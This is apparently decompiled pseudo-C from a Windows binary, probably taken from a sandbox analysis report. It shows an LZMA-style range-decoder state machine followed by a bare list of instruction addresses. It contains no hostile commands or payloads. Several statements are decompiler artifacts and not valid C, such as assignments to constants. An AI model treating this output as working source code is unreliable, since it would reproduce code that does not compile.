					switch( *((intOrPtr*)(_t534 * 4 +  &M00406926))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								goto L89;
							}
							__eflags =  *(__ebp - 0x60);
							if( *(__ebp - 0x60) == 0) {
								goto L171;
							}
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							_t258 =  *(__ebp - 0x38) - 7 >= 0;
							__eflags = _t258;
							0 | _t258 = _t258 + _t258 + 9;
							 *(__ebp - 0x38) = _t258 + _t258 + 9;
							goto L75;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							L89:
							__eax =  *(__ebp - 4);
							 *(__ebp - 0x80) = 0x15;
							__eax =  *(__ebp - 4) + 0xa68;
							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
							goto L68;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							goto L36;
						case 0xe:
							goto L45;
						case 0xf:
							goto L57;
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							L68:
							__esi =  *(__ebp - 0x58);
							 *(__ebp - 0x84) = 0x12;
							goto L132;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							goto L55;
						case 0x1b:
							L75:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1b;
								goto L170;
							}
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							__eflags = __eax -  *(__ebp - 0x74);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
								__eflags = __eax;
							}
							__edx =  *(__ebp - 8);
							__cl =  *(__eax + __edx);
							__eax =  *(__ebp - 0x14);
							 *(__ebp - 0x5c) = __cl;
							 *(__eax + __edx) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t274 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t274;
							__eax =  *(__ebp - 0x68);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							_t283 = __ebp - 0x64;
							 *_t283 =  *(__ebp - 0x64) - 1;
							__eflags =  *_t283;
							 *( *(__ebp - 0x68)) = __cl;
							goto L79;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__edx =  *(__ebp - 8);
								__cl =  *(__eax + __edx);
								__eax =  *(__ebp - 0x14);
								 *(__ebp - 0x5c) = __cl;
								 *(__eax + __edx) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t414 = __eax %  *(__ebp - 0x74);
								__eax = __eax /  *(__ebp - 0x74);
								__edx = _t414;
								__eax =  *(__ebp - 0x68);
								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
								__eflags =  *(__ebp - 0x30);
								 *( *(__ebp - 0x68)) = __cl;
								 *(__ebp - 0x14) = __edx;
								if( *(__ebp - 0x30) > 0) {
									continue;
								} else {
									goto L80;
								}
							}
							 *(__ebp - 0x88) = 0x1c;
							goto L170;
					}
				}
			}

0x00000000
0x00406083
0x00406083
0x00406088
0x004060ff
0x00406106
0x00406110
0x004066ef
0x004066ef
0x004066f2
0x004066f2
0x004066f8
0x004066fe
0x00406704
0x0040671e
0x00406721
0x00406727
0x00406732
0x00406734
0x00406706
0x00406706
0x00406715
0x00406719
0x00406719
0x0040673e
0x00406765
0x00406765
0x0040676b
0x0040676b
0x00000000
0x00406740
0x00406740
0x00406744
0x004068f3
0x00000000
0x004068f3
0x00406750
0x00406757
0x0040675f
0x00406762
0x00000000
0x00406762
0x0040608a
0x0040608a
0x0040608e
0x00406096
0x00406099
0x0040609b
0x0040609e
0x004060a0
0x004060a5
0x004060a8
0x004060af
0x004060b6
0x004060b9
0x004060c4
0x004060cc
0x004060cc
0x004060c6
0x004060c6
0x004060c6
0x004060bb
0x004060bb
0x004060bb
0x004060d3
0x004060f1
0x004060f3
0x004062c6
0x004062c6
0x004062c9
0x004062cc
0x004062cf
0x004062d2
0x004062d5
0x004062d8
0x004062db
0x004062de
0x004062e4
0x004062fc
0x004062ff
0x00406302
0x00406305
0x00406305
0x00406308
0x0040630e
0x004062e6
0x004062e6
0x004062ee
0x004062f3
0x004062f5
0x004062f7
0x004062f7
0x00406318
0x0040631b
0x004062be
0x004062c4
0x00000000
0x00000000
0x00000000
0x0040631d
0x00406299
0x0040629d
0x004068a5
0x00000000
0x004068a5
0x004062a3
0x004062a6
0x004062a9
0x004062ad
0x004062b0
0x004062b6
0x004062b8
0x004062b8
0x004062bb
0x00000000
0x004062bb
0x004060d5
0x004060d5
0x004060d8
0x004060de
0x004060e0
0x004060e0
0x004060e3
0x004060e6
0x004060e8
0x004060e9
0x004060ec
0x00406159
0x00406159
0x0040615d
0x00406160
0x00406163
0x00406166
0x00406169
0x0040616a
0x0040616d
0x0040616f
0x00406175
0x00406178
0x0040617b
0x0040617e
0x00406181
0x00406187
0x004061a3
0x004061a6
0x004061a9
0x004061ac
0x004061b3
0x004061b9
0x004061bd
0x00406189
0x00406189
0x0040618d
0x00406195
0x0040619a
0x0040619c
0x0040619e
0x0040619e
0x004061c7
0x004061ca
0x00406141
0x00406141
0x00406147
0x004061fa
0x00406200
0x00000000
0x00000000
0x00406202
0x00406205
0x00406208
0x0040620b
0x0040620e
0x00406211
0x00406214
0x00406217
0x0040621a
0x00406220
0x00406238
0x0040623b
0x0040623e
0x00406241
0x00406241
0x00406244
0x0040624a
0x00406222
0x00406222
0x0040622a
0x0040622f
0x00406231
0x00406233
0x00406233
0x00406254
0x00406257
0x004061d5
0x004061d9
0x00406899
0x00000000
0x00406899
0x004061df
0x004061e2
0x004061e5
0x004061e9
0x004061ec
0x004061f2
0x004061f4
0x004061f4
0x004061f7
0x004061f7
0x00406257
0x0040625e
0x0040625e
0x0040625e
0x00406262
0x00406262
0x00406265
0x00406268
0x0040626c
0x004068b1
0x00000000
0x004068b1
0x00406272
0x00406275
0x00406278
0x0040627b
0x0040627e
0x00406281
0x00406284
0x00406286
0x00406289
0x0040628c
0x0040628f
0x00406291
0x00406291
0x00406291
0x0040642e
0x0040642e
0x00406431
0x00406431
0x00000000
0x00406431
0x00406153
0x00000000
0x00000000
0x00000000
0x004061d0
0x0040611c
0x00406120
0x0040688d
0x00406909
0x00406911
0x00406918
0x0040691a
0x00406921
0x00406925
0x00406925
0x00406126
0x00406129
0x0040612c
0x00406130
0x00406133
0x00406139
0x0040613b
0x0040613b
0x0040613e
0x00000000
0x0040613e
0x004061ca
0x004060d3
0x00405f07
0x00405f07
0x00405f10
0x0040691e
0x0040691e
0x00000000
0x0040691e
0x00405f16
0x00000000
0x00405f21
0x00000000
0x00000000
0x00405f2a
0x00405f2d
0x00405f30
0x00405f34
0x00000000
0x00000000
0x00405f3a
0x00405f3d
0x00405f3f
0x00405f40
0x00405f43
0x00405f45
0x00405f46
0x00405f48
0x00405f4b
0x00405f50
0x00405f55
0x00405f5e
0x00405f71
0x00405f74
0x00405f80
0x00405fa8
0x00405faa
0x00405fb8
0x00405fb8
0x00405fbc
0x00000000
0x00000000
0x00000000
0x00000000
0x00405fac
0x00405fac
0x00405faf
0x00405fb0
0x00405fb0
0x00000000
0x00405fac
0x00405f86
0x00405f8b
0x00405f8b
0x00405f94
0x00405f9c
0x00405f9f
0x00000000
0x00405fa5
0x00405fa5
0x00000000
0x00405fa5
0x00000000
0x00405fc2
0x00405fc2
0x00405fc6
0x00406872
0x00000000
0x00406872
0x00405fcf
0x00405fdf
0x00405fe2
0x00405fe5
0x00405fe5
0x00405fe5
0x00405fe8
0x00405fec
0x00000000
0x00000000
0x00405fee
0x00405ff4
0x0040601e
0x00406024
0x0040602b
0x00000000
0x0040602b
0x00405ffa
0x00405ffd
0x00406002
0x00406002
0x0040600d
0x00406015
0x00406018
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040605d
0x00406063
0x00406066
0x00406073
0x0040607b
0x00000000
0x00000000
0x00406032
0x00406032
0x00406036
0x00406881
0x00000000
0x00406881
0x00406042
0x0040604d
0x0040604d
0x0040604d
0x00406050
0x00406053
0x00406056
0x0040605b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406322
0x00406326
0x00406344
0x00406347
0x0040634e
0x00406351
0x00406354
0x00406357
0x0040635a
0x0040635d
0x0040635f
0x00406366
0x00406367
0x00406369
0x0040636c
0x0040636f
0x00406372
0x00406372
0x00406377
0x00000000
0x00406377
0x00406328
0x0040632b
0x0040632e
0x00406338
0x00000000
0x00000000
0x0040638c
0x00406390
0x004063b3
0x004063b6
0x004063b9
0x004063c3
0x00406392
0x00406392
0x00406395
0x00406398
0x0040639b
0x004063a8
0x004063ab
0x004063ab
0x00000000
0x00000000
0x004063cf
0x004063d3
0x00000000
0x00000000
0x004063d9
0x004063dd
0x00000000
0x00000000
0x004063e3
0x004063e5
0x004063e9
0x004063e9
0x004063ec
0x004063f0
0x00000000
0x00000000
0x00406440
0x00406444
0x0040644b
0x0040644e
0x00406451
0x0040645b
0x00000000
0x0040645b
0x00406446
0x00000000
0x00000000
0x00406467
0x0040646b
0x00406472
0x00406475
0x00406478
0x0040646d
0x0040646d
0x0040646d
0x0040647b
0x0040647e
0x00406481
0x00406481
0x00406484
0x00406487
0x0040648a
0x0040648a
0x0040648d
0x00406494
0x00406499
0x00000000
0x00000000
0x00406527
0x00406527
0x0040652b
0x004068c9
0x00000000
0x004068c9
0x00406531
0x00406534
0x00406537
0x0040653b
0x0040653e
0x00406544
0x00406546
0x00406546
0x00406546
0x00406549
0x0040654c
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004065aa
0x004065aa
0x004065ae
0x004068d5
0x00000000
0x004068d5
0x004065b4
0x004065b7
0x004065ba
0x004065be
0x004065c1
0x004065c7
0x004065c9
0x004065c9
0x004065c9
0x004065cc
0x00000000
0x00000000
0x0040637a
0x0040637a
0x0040637d
0x00000000
0x00000000
0x004066b9
0x004066bd
0x004066df
0x004066e2
0x004066ec
0x00000000
0x004066ec
0x004066bf
0x004066c2
0x004066c6
0x004066c9
0x004066c9
0x004066cc
0x00000000
0x00000000
0x00406776
0x0040677a
0x00406798
0x00406798
0x00406798
0x0040679f
0x004067a6
0x004067ad
0x004067ad
0x00000000
0x004067ad
0x0040677c
0x0040677f
0x00406782
0x00406785
0x0040678c
0x004066d0
0x004066d0
0x004066d3
0x00000000
0x00000000
0x00406867
0x0040686a
0x00000000
0x00000000
0x004064a1
0x004064a3
0x004064aa
0x004064ab
0x004064ad
0x004064b0
0x00000000
0x00000000
0x004064b8
0x004064bb
0x004064be
0x004064c0
0x004064c2
0x004064c2
0x004064c3
0x004064c6
0x004064cd
0x004064d0
0x004064de
0x00000000
0x00000000
0x004067b4
0x004067b4
0x004067b7
0x004067be
0x00000000
0x00000000
0x004067c3
0x004067c3
0x004067c7
0x004068ff
0x00000000
0x004068ff
0x004067cd
0x004067d0
0x004067d3
0x004067d7
0x004067da
0x004067e0
0x004067e2
0x004067e2
0x004067e2
0x004067e5
0x004067e8
0x004067e8
0x004067e8
0x004067e8
0x004067eb
0x004067eb
0x004067ef
0x0040684f
0x00406852
0x00406857
0x00406858
0x0040685a
0x0040685c
0x0040685f
0x00000000
0x0040685f
0x004067f1
0x004067f7
0x004067fa
0x004067fd
0x00406800
0x00406803
0x00406806
0x00406809
0x0040680c
0x0040680f
0x00406812
0x0040682b
0x0040682e
0x00406831
0x00406834
0x00406838
0x0040683a
0x0040683a
0x0040683b
0x0040683e
0x00406814
0x00406814
0x0040681c
0x00406821
0x00406823
0x00406826
0x00406826
0x00406841
0x00406848
0x00000000
0x0040684a
